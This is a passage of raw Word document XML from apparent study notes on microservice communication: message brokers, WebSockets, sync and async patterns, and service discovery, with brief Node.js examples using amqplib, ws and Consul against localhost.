    <w:p w14:paraId="46E19DD2"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console.log('Response:', response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58704F5D"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67A186F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC385F3"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9F69B68"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4B4E6B6" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Message Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B038665"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Message brokers like RabbitMQ, Apache Kafka, or Redis Streams handle communication through message queues or topics. Microservices publish messages to queues/topics and other services consume these messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147A5F6"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Asynchronous communication, event-driven architecture, decoupling services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B69CF7"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1CB09E54"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Supports asynchronous communication and decouples services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB6B3E3"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Offers features like message durability and retry mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021FEE39"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1E02C39F"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Adds complexity and infrastructure overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B17661B"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May introduce some latency due to message queuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB50541" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example in Node.js using amqplib for RabbitMQ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F0126"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amqp = require('amqplib');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5BC13B"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E10D7A4"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sendMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D74F0"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connection = await amqp.connect('amqp://localhost');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EBE42A"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channel = await connection.createChannel();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259D1C51"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queue = 'task_queue';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175408F9"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DE8FF1E"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await channel.assertQueue(queue, { durable: true });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8FE064"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channel.sendToQueue(queue, Buffer.from('Hello World'), { persistent: true });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0228A"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A59C32E"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 [x] Sent 'Hello World'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A17448"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await channel.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6CD51"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await connection.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F6A20"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D073554"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89599FB"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sendMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40EA14" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WebSockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B60EE70"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WebSockets provide a full-duplex communication channel over a single, long-lived connection. This is suitable for real-time communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A80B30"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Real-time applications like chat apps, live dashboards, collaborative tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C21BBD"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16AED956"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Enables real-time, bidirectional communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD46A25"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Reduces overhead compared to establishing multiple HTTP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF8E63C" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="307"/>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66A548A3"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Requires managing open connections and handling connection failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE081EF" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="307"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>More complex to implement compared to REST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E59D2B" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example in Node.js using ws package:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE700C"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WebSocket = require('ws');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D4989"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D7AEA0F"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ws = new WebSocket('ws://localhost:8080');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71FA65"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29FD054"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ws.on('open', function open() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380805FA"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ws.send('Hello Server!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA0B08"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5E60920"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4F8D496"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ws.on('message', function incoming(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49004EAA"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console.log(`Received: ${data}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD6B73C"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7404CB7" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Communication Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CBF31B" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Synchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A187E"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Services communicate directly with each other and wait for a response before proceeding. This is often implemented using HTTP/REST or gRPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CA70C4"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Real-time or immediate response requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F54E49F"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66D3844C"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Simple to implement and understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B873DF6"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Direct interaction between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60E4D9"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16385AE9"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lastRenderedPageBreak/>
        <w:t>Can create tight coupling between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B045CB6"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Can lead to cascading failures if one service is down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41657135" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4D5D8"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Services communicate via a message broker or event bus, and responses are handled asynchronously. This pattern is often used with message brokers or event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137CA646"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Event-driven systems, decoupled services, tasks that don’t require immediate responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30038700"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125ECDFD"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Loose coupling between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A112538"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Improved resilience and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECDCC07"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18191DF5"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Complexity in managing message delivery and handling failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169F0BAF"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Potential for increased latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FFD95" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25002222"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Services publish and listen to events through an event bus or stream. This pattern allows services to react to events asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112A4680"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Complex workflows, real-time updates, distributed systems with varying load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF4F4E"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1AF21CA9"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Supports loose coupling and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55423125"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Can handle high volumes of events and messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676449A8"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0D6A9D7B"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Requires robust event handling and processing logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E283D4B"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Complexity in managing event schemas and ensuring data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C43644" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A62CE9C"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A mechanism for services to discover and interact with each other dynamically. Service discovery can be managed through a service registry or discovery service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CEC8B"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Dynamic environments where services may scale up or down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2B8157"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560DAF36"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Supports dynamic and scalable service architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660784D4"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Simplifies configuration and management of service endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497FAD87" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="308"/>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4230FF31"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Adds another layer of complexity and infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBACAE6" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Requires reliable and consistent service registry mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5506BA10" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example using consul for service discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C86C4"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consul = require('consul')();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B06BD"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C0E4C1E"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consul.agent.service.register({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8ACB00"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'my-service',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469AB05E"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address: '127.0.0.1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376CD93F"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port: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D70A38"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(err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AFF95D"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4AFE114B"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console.log('Service registered');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA400B" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="0057736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E4FA40D" w14:textId="0D528854" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc178383295"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the concept of service discovery in microservices architecture.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="0DFA2AD1"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Service discovery is a crucial component in a microservices architecture, helping services find and communicate with each other dynamically. In a distributed system where services can scale up or down, or where instances might be added or removed, service discovery ensures that services can locate and interact with each other without needing hard-coded endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149527D"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here’s a detailed look at service discovery, including its importance, common methods, and tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE78F4" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Importance of Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA2DF90" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dynamic Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Microservices may be scaled horizontally, meaning instances of a service can be added or removed dynamically. Service discovery helps other services find the new instances without needing manual configuration updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4267769F" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If a service instance fails or becomes unavailable, service discovery can help reroute requests to healthy instances, improving system reliability and resilience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E8D67" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>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 Service discovery often works in conjunction with load balancing to distribute traffic across multiple instances of a service, enhancing performance and reducing bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C36183" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplified Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: It eliminates the need for hard-coded service endpoints, which simplifies configuration and deployment processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A80C829" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Service Discovery Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BCA8D" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Client-Side Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E64E3A"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In client-side discovery, the client (or service) is responsible for querying the service registry to find instances of the service it needs to communicate with. The client then directly interacts with the discovered instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853DA18" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="310"/>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63E28815" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Direct control of load balancing and service selection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B84C5" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can be more flexible in terms of how services are discovered and used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777125B2" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="310"/>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4AC01D57" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
